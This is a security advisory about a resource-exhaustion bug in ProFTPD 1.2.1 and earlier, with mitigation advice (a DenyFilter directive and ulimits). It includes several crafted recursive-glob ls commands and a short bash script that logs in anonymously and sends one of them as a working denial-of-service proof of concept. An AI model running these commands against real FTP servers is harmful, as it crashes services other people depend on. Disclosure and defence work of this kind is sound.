COMMAND

    Proftpd

SYSTEMS AFFECTED

    Proftpd

PROBLEM

    'The  Flying  Hamster'   posted  following.    ProFTPD  1.2.1   is
    vulnerable.  Earlier  versions are also  believed to be  affected.
    Problem commands include:

        ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
        ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
        ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/

    Other commands of this style may also cause the same behavior; the
    exact commands listed here are not necessary to trigger.

    The daemon process starts to consume all CPU and memory  resources
    available to it.   Multiple simultaneous instances will  result in
    faster depletion of resources,  causing either the daemon  process
    or the server to crash.

        #!/bin/bash
        ftp -n FTP-SERVER<<\end
        quot user anonymous
        bin
        quot pass shitold@bug.com
        ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
        bye
        end

    This bug appears to still  be present with Debian Stable  (Potato)
    which uses ProFTPd v1.2.0pre10.

SOLUTION

    A patch  against the  1.2.1 source  is currently  being worked on.
    However, given  the nature  of the  problem and  the lack  of time
    given between notification  and publication of  the vulnerability,
    it is not ready for release yet.

    Until  a  more  permanent  fix  is  ready, we recommend adding the
    following directive  in the  <Global> context  which should  catch
    most variants of this problem.

        DenyFilter \*.*/

    We  also  recommend  that  the  daemon  process  is  started  with
    appropriate ulimits set to  control the system resources  that can
    be  utilized  by  the  running   daemon.   This  should  help   in
    maintaining a viable  server regardless attacks  being made.   The
    development  team  is  looking  into  modifying ProFTPD to provide
    native ulimit functionality.